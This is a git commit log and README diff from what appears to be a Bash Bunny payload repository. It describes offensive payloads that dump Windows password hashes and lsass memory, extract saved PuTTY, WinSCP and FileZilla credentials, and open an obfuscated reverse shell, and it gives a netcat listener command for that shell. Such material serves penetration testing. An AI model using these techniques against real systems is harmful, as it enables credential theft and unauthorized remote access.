Updated PingZhellBunny Fixed wrong DELAY commands * Updated WifiSnatch Fixed multiple mistakes * Uploaded HashDumpBunny Use your BashBunny to dump the user hashes of your target - similar to the msf post-module. The script was obfuscated with multiple layers, so don't be confused. If you don't trust this script, run it within a save testing space - which should be best practice anyways ;) * added example picture * Update README.md * Uploaded SessionBunny Utilize SessionGopher (Slightly modified) to find PuTTY, WinSCP, and Remote Desktop saved sessions. It decrypts saved passwords for WinSCP. Extracts FileZilla, SuperPuTTY's saved session information in the sitemanager.xml file and decodes saved passwords. Afterwards decide which is important and what you want to save onto your BashBunny. * Uploaded SessionBunny Utilize the famous, here slightly modified SessionGopher script, to find PuTTY, WinSCP, and Remote Desktop saved sessions. It decrypts saved passwords for WinSCP. Extracts FileZilla, SuperPuTTY's saved session information in the sitemanager.xml file and decodes saved passwords. Decide which inforamtion you wanna take with you - save it onto your BashBunny! * Update README.md * Delete SessionBunny directory * Uploaded MiniDumpBunny Dump lsass with this rewritten and for BashBunny adapted version of Powersploits Out-MiniDump. * Update README.md added disclaimer * Update README.md * Update README.md --- payloads/library/credentials/HashDumpBunny/README.md | 3 ++- payloads/library/remote_access/ReverseBunny/README.md | 10 +++++----- 2 files changed, 7 insertions(+), 6 deletions(-) diff --git a/payloads/library/credentials/HashDumpBunny/README.md b/payloads/library/credentials/HashDumpBunny/README.md index f2b9c89a..b1460dd5 100644 --- a/payloads/library/credentials/HashDumpBunny/README.md +++ b/payloads/library/credentials/HashDumpBunny/README.md 
@@ -9,7 +9,8 @@ Version: 1.0 This payload will run an obfuscated script to dump user hashes. If you don't trust this obfuscated .bat file, you should run it within a save space first - which should be best practice anyways ;-) # - +**!Depending on your Windows version, this might not work as intended!** +# **Instruction:** Place BunnyDump.bat in the same payload switch-folder as your payload.txt diff --git a/payloads/library/remote_access/ReverseBunny/README.md b/payloads/library/remote_access/ReverseBunny/README.md index 7fced069..5cd530b3 100644 --- a/payloads/library/remote_access/ReverseBunny/README.md +++ b/payloads/library/remote_access/ReverseBunny/README.md @@ -1,14 +1,14 @@ -Title: ReverseBunny +**Title: ReverseBunny** Author: 0iphor13 -Version: 1.2 +Version: 1.3 -Getting remote access via obfuscated reverse shell. -Change the variables in payload.txt to your attacking maschine & start your listener. +

Getting remote access via obfuscated reverse shell.
+Change the variables in payload.txt to your attacking maschine & start your listener. (for example netcat: nc -lvnp [PORT] )

-Whats new in version 1.2? +Whats new in version 1.3? - Changed the whole payload - Added custom shell design